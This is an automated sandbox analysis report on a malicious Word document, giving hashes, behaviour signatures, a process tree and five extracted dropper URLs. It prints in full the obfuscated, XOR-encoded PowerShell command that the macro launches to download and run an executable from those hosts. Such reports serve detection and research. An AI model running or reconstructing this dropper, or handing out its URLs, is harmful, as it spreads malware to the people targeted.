Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    20-05-2024 13:59

General

  • Target

    5f73269a632986304114e57d3eb98b53_JaffaCakes118.doc

  • Size

    109KB

  • MD5

    5f73269a632986304114e57d3eb98b53

  • SHA1

    fb222d6c7b0f99612d5da76e0e0479b5d196590e

  • SHA256

    02c97c7cfa6fa18281256b83b09b0457d667c095c64bdcdab009cefaeed524a5

  • SHA512

    98158dbb354ecb5a3d17c298f1d5a1d62ac26d252090a78a17c2c95bb58e63e1cd2746a6a95e79b3b5522a6dde74018d04e58c13b86b94fc7cd2b85082527e6d

  • SSDEEP

    1536:3FFFF7dC7MQMXc0qg4F5MnrA+aJks0abqExYBvAy42+Ge:XQ5g4fYXZAyh

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.copticpope.org/7nCPQr/

exe.dropper

http://wevik.hu/oadkCq/

exe.dropper

http://jakeingles.com/W3cw/

exe.dropper

http://www.kaukabphysiatry.com/hg9g/

exe.dropper

http://www.facebook.printuser.nl/dhxj/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5f73269a632986304114e57d3eb98b53_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1672
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2500
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.exe
        PowersHell ('25X71X91!126!0_83<88q74_16<82{95!87<88{94}73j29T115{88{73{19j106j88{95!126{81{84T88E83j73j6_25X77j77}100j0q26X85T73X73_77_7!18<18_74X74}74T19_94_82T77X73<84!94{77}82T77T88<19{82{79_90E18E10<83_126}109T108X79}18T125X85_73}73{77<7!18{18<74}88}75j84T86}19}85q72X18q82X92!89E86!126E76!18E125{85X73!73T77_7E18E18X87}92q86j88}84}83T90}81_88j78j19E94!82<80j18X106{14q94!74_18}125E85{73T73}77E7!18_18}74E74{74{19q86X92}72{86j92{95!77T85{68<78E84T92X73}79{68E19q94E82<80X18{85_90<4X90{18}125X85!73_73_77X7!18T18{74X74}74!19_91q92_94<88{95!82{82_86{19}77}79!84q83{73j72}78T88{79T19!83{81j18X89T85T69q87_18q26X19q110!77E81j84X73_21T26q125j26q20!6{25<105j114q106<29X0T29j26}4<14T26X6X25<73E85_116j0T25T88T83<75X7}73j88j80{77<22j26}97{26{22q25T105E114X106j22_26_19{88!69j88{26!6!91!82!79{88E92X94_85X21T25_107j79}105T29T84T83T29<25j77j77<100!20{70j73X79_68E70j25}71}91{126}19j121}82j74<83<81T82!92E89{123_84!81E88!21T25j107<79X105_17X29T25E73{85!116<20{6_110!73E92X79j73!16_109E79j82q94T88q78<78}29E25_73!85E116q6{95{79q88j92_86T6{64_94}92q73T94!85T70{64X64'.SplIT('<X!_q{jET}' )| % {[ChAr] ( $_-bxOR 0x3d )}) -jOIN '' | . ( ([StrIng]$VErbosEPRefeReNCE)[1,3]+'x'-joIN'')
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1212

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      3a47f6bbe4f80c56031d75205788ed90

      SHA1

      af044cb4650d37623f16bfa3b64f1fac1539d31d

      SHA256

      4235919f6cdcccf8e2177ad994d78a9b5a65736434de15f02da63b177a5e8c9a

      SHA512

      a4f1d6f6e258613549ced3194d5e79cb30752b68f2147aee6233514a7b4879745173d51badc1a02ed35085923abd2914ac43d4cc4ed1c2da2eee548e376e41f2

    • memory/1672-19-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-57-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-81-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-18-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-75-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-74-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-64-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-17-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-50-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-43-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-36-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-29-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-22-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-16-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-20-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-0-0x000000002FA01000-0x000000002FA02000-memory.dmp

      Filesize

      4KB

    • memory/1672-24-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-2-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB

    • memory/1672-21-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-15-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-6-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-80-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-78-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-77-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-76-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-12-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-9-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-8-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-7-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-89-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB

    • memory/1672-90-0x0000000000510000-0x0000000000610000-memory.dmp

      Filesize

      1024KB

    • memory/1672-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1672-106-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB